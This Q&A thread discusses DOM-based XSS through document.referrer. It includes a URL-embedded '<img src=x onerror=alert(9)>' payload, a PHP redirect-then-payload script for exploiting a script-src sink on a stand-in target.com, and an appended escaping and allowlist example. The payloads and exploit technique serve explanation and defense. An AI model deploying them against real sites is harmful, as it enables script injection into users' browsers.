11

A very simple example...

<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = document.referrer;
</script>

or

<script src="' + document.referrer + '"></script>

I've tried simply sending the request and adding a referrer header, but that doesn't seem to echo onto the page.

Michael Blake
  • Perhaps your browser has some integrated "protection" against reflected XSS. – CodesInChaos Aug 27 '14 at 07:56
  • @CodesInChaos I've tried two separate versions of Firefox. Also, I'm not setting the referrer header to anything harmful and it still doesn't work for the first example. – Michael Blake Aug 27 '14 at 08:01
  • @CodesInChaos That always bugs me, but it is spelled "referrer". – Michael Blake Aug 27 '14 at 08:07
  • actually for me it works both on FF and chrome – aviv Aug 27 '14 at 08:18
  • @aviv I've tried multiple times with Chrome and Firefox with the following page: http://jsfiddle.net/4zaz1uga/ and I get the same result every time. – Michael Blake Aug 27 '14 at 08:26
  • assigning to `innerHTML` doesn't run ` – Mike Samuel Aug 27 '14 at 14:27
  • @MikeSamuel Thank you, but the referrer isn't changed at all. I'm not trying to even run any javascript. For example, if I go to http://jsfiddle.net/4zaz1uga/ from here, it should display this question's URL, but instead, it shows http://jsfiddle.net. – Michael Blake Aug 27 '14 at 19:50
  • @MichaelBlake, sorry, I misunderstood which part was the payload and which was the container. – Mike Samuel Aug 28 '14 at 13:11

2 Answers

5

Updated browsers will encode the referrer URL.

So your examples will not work to trigger XSS nowadays.

Try this:

<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = decodeURIComponent(document.referrer);
</script>

JSFIDDLE:

http://jsfiddle.net/y4afy8h9/1/?<img%20src=x%20onerror=alert(9)>?

Lucas NN
2

The following code is vulnerable to DOM based XSS, because the attacker-controlled value of document.referrer is tracked by the browser:

<script src="' + document.referrer + '"></script>

The code above can be exploited using a page that upon first load redirects the browser to your target, on the 2nd load it returns an XSS payload. One way of doing this is checking the referer on the server-side:

<?php
// First visit (no target referer): redirect the browser to the target page.
// Second request (made by the target's <script src>, carrying the target as referer): return the payload.
if ($_SERVER['HTTP_REFERER'] == 'http://target.com/xss') {
   print "alert('xss')";
} else {
   header("location: http://target.com/xss");
}
?>

When the page http://target.com/xss loads, the JavaScript it loads from document.referrer will be alert('xss').

rook
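As an added example (not code from the question or either answer), the two sinks discussed above with the referrer treated as untrusted input: the innerHTML sink written via escaping, and the script-src sink checked against an allowlist of origins. The allowlist entry static.example.com is an assumed placeholder, and the functions return the strings that would reach the DOM so they can be checked without a browser.

```javascript
// Added example, not from the original post. Runs in Node; no DOM needed.

// Sink 1: innerHTML. Prefer textContent where possible; if the value must
// land in an HTML context, escape the five significant characters first.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Mirrors the decodeURIComponent(document.referrer) -> innerHTML pattern from
// the accepted answer, returning the markup that would be written.
function renderReferrerVulnerable(referrer) {
  return decodeURIComponent(referrer);
}

// Hardened form: decode for display, then escape before any HTML parser sees it.
function renderReferrerSafe(referrer) {
  let decoded;
  try { decoded = decodeURIComponent(referrer); } catch (e) { decoded = referrer; }
  return escapeHtml(decoded);
}

// Sink 2: <script src="...">. A script URL should never be derived from the
// referrer; if one must be, accept only https URLs whose origin is allowlisted.
const ALLOWED_SCRIPT_ORIGINS = new Set(["https://static.example.com"]); // assumed placeholder

function scriptSrcFromReferrer(referrer) {
  let url;
  try { url = new URL(referrer); } catch (e) { return null; } // not an absolute URL
  if (url.protocol !== "https:") return null;                  // rejects http:, javascript:, data:
  if (!ALLOWED_SCRIPT_ORIGINS.has(url.origin)) return null;    // attacker-controlled host
  return url.href;
}
```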